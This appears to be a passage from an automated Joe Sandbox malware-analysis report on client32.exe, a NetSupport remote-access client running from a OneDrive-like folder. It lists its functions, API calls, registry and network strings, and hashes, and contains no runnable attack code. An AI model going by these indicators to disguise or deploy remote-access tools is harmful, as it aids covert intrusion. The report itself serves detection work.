                                                        • Instruction ID: d3a79397b9aca74b41b2e47cdc2cb53976e07f1183ce263d33de4038ac76f0b1
                                                        • Opcode Fuzzy Hash: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
                                                        • Instruction Fuzzy Hash: 3C011B76B40614AFD721DEA5DC84F5BB7FCEB88665F01492AE985D6640D630E8008BA0
                                                        Function 11102700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
                                                        • CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
                                                        • CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                        • API String ID: 3360349984-1136101629
                                                        • Opcode ID: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
                                                        • Instruction ID: 500c2b3c3357f9213b13d9fe8d1126e8dc21d1a7e49489592dffc9e6a9027773
                                                        • Opcode Fuzzy Hash: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
                                                        • Instruction Fuzzy Hash: 1C01717A7007116FE3218E95DC85F9BFBA8EB56764F108528FA15962C0D770E4058BB0
                                                        Function 11109440 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 1110946F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111094A7
                                                        • RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 111094C3
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111094CD
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseValue$OpenQuery
                                                        • String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
                                                        • API String ID: 3962714758-504756767
                                                        • Opcode ID: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
                                                        • Instruction ID: e2b4fe1a7407c51d3679897667db751a92ae8154eaac79b11ee734c705fb4573
                                                        • Opcode Fuzzy Hash: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
                                                        • Instruction Fuzzy Hash: 33019279B40209FFEB00EF90DD4AFAEF778AB44709F008045FE18A7184D6B0A614DBA1
                                                        Function 1102FD80 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: %s%s%s.bin$494126$_HF$_HW$_SW
                                                        • API String ID: 2111968516-430959295
                                                        • Opcode ID: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
                                                        • Instruction ID: c25928671520f454b92b43ec0ad7b42779770566938daa2e780b2e5a9d994659
                                                        • Opcode Fuzzy Hash: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
                                                        • Instruction Fuzzy Hash: CBE09260D0420C2BF600A1488C05BDBBB9F1740399FC0C044BEABAA286FD249400869B
                                                        Function 6C814F90 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 6C814FA1
                                                          • Part of subcall function 6C8161A0: _memset.LIBCMT ref: 6C8161BF
                                                          • Part of subcall function 6C8161A0: _strncpy.LIBCMT ref: 6C8161CB
                                                          • Part of subcall function 6C808C00: EnterCriticalSection.KERNEL32(6C849898,?,?,00000000,?,6C80C0C1,?,00000000), ref: 6C808C23
                                                          • Part of subcall function 6C808C00: InterlockedExchange.KERNEL32(?,00000000), ref: 6C808C88
                                                          • Part of subcall function 6C808C00: Sleep.KERNEL32(00000000,?,6C80C0C1,?,00000000), ref: 6C808C9E
                                                          • Part of subcall function 6C808C00: LeaveCriticalSection.KERNEL32(6C849898,00000000), ref: 6C808CD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                        • String ID: 1.2$Channel$Client$Publish %d pending services
                                                        • API String ID: 1112461860-1140593649
                                                        • Opcode ID: afeb91311d3ef3211a531bbd5da6b6790a90067503532aef1c584e6de41ca460
                                                        • Instruction ID: 5fdeb0a8509b6a8b6b89e4219af773b3e0a8cda93bf18bf3be81b68c3ca02318
                                                        • Opcode Fuzzy Hash: afeb91311d3ef3211a531bbd5da6b6790a90067503532aef1c584e6de41ca460
                                                        • Instruction Fuzzy Hash: F251CF30B083468FEB31EAA99F44BAA37F5AB1231CF248D39D451C6E81E7759148C7D2
                                                        Function 110F6190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110F61E3
                                                        • GetStockObject.GDI32(00000004), ref: 110F623B
                                                        • RegisterClassA.USER32(?), ref: 110F624F
                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00100000,00000000,00000000,00000000), ref: 110F628A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                        • String ID: NSMDesktopWnd
                                                        • API String ID: 2669163067-206650970
                                                        • Opcode ID: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
                                                        • Instruction ID: 346a4b555008fa5bb99351eae23e3b1030b3e8e24f27a1909c2d26c4daee2dcd
                                                        • Opcode Fuzzy Hash: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
                                                        • Instruction Fuzzy Hash: 0F31E5B5D05659AFCB40DFA9D884A9EFBF8FB09714F50862EE819E3244E7345900CB94
                                                        Function 6C804FD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C818210: _strncpy.LIBCMT ref: 6C818234
                                                        • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C805051
                                                        • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C805062
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C80508D
                                                        Strings
                                                        • Cannot resolve hostname %s, error %d, xrefs: 6C805096
                                                        • Gateway_WebProxy, xrefs: 6C804FEA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                        • String ID: Cannot resolve hostname %s, error %d$Gateway_WebProxy
                                                        • API String ID: 2603238076-4066638241
                                                        • Opcode ID: 48722d780a63b1f606c47696aa235d67322c141eed464152551ff3cba1eef626
                                                        • Instruction ID: fb71b2fb066db2eb72145df06a0eec2b4730f70f8181b12f6a646caf712de4b7
                                                        • Opcode Fuzzy Hash: 48722d780a63b1f606c47696aa235d67322c141eed464152551ff3cba1eef626
                                                        • Instruction Fuzzy Hash: 1E21EA31A012199BDB30DB69CD40FDAB3F8EF45218F4089A9E949DB740EF759948CBE1
                                                        Function 11134660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
                                                        • RegCloseKey.ADVAPI32(?), ref: 11134734
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpen
                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                        • API String ID: 47109696-3245241687
                                                        • Opcode ID: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
                                                        • Instruction ID: 7a7cfa5f29f4a3e9be51cc667e7100b43bb54833ec5544d3ab887deb0b5b3a13
                                                        • Opcode Fuzzy Hash: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
                                                        • Instruction Fuzzy Hash: F9210AB9E5062ADBE721DE64CD80FDAF7B8AB85319F1041AAD81DF3244D630DD448BA0
                                                        Function 111049C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11104920: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
                                                          • Part of subcall function 11104920: __wsplitpath.LIBCMT ref: 11104965
                                                          • Part of subcall function 11104920: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999
                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11104A68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                        • API String ID: 806825551-1858614750
                                                        • Opcode ID: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
                                                        • Instruction ID: e7f9985d51565af38080bde2b7bad96e9363af9279f09dbbe9d4585dd592ed72
                                                        • Opcode Fuzzy Hash: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
                                                        • Instruction Fuzzy Hash: 72214636E441859AE701CE709EC0BFFBFAADF85214F0481ACEC52C7502E726EA04C790
                                                        Function 11133650 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11133070: GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
                                                          • Part of subcall function 11133070: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\client32.exe,00000104,?,111332C3,?), ref: 11133099
                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336A5
                                                        • ResetEvent.KERNEL32(00000250), ref: 111336B9
                                                        • SetEvent.KERNEL32(00000250), ref: 111336CF
                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                        • String ID: MiniDump
                                                        • API String ID: 1494854734-2840755058
                                                        • Opcode ID: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
                                                        • Instruction ID: 2f84af38c29f256cee2cc1ffc865d9f7da14dec3b61b68d8c3c8670bee4004e0
                                                        • Opcode Fuzzy Hash: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
                                                        • Instruction Fuzzy Hash: D8112CB29242257FD700DBA89C85F9AF7989B44739F104234F924D73C8EA71E600CBB9
                                                        Function 11135DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11135DCF
                                                        • wsprintfA.USER32 ref: 11135E06
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                        • API String ID: 1985783259-2296142801
                                                        • Opcode ID: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
                                                        • Instruction ID: 856d5068e0010e8f5460d586c9b7f9a33cbca200768314754285dae5934ecd8a
                                                        • Opcode Fuzzy Hash: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
                                                        • Instruction Fuzzy Hash: 9111E9FAD101296BC710DA65DD85F9AF76C9B84719F004164EF04B7149EA30AA0587A4
                                                        Function 11102870 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memset.LIBCMT ref: 111028C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
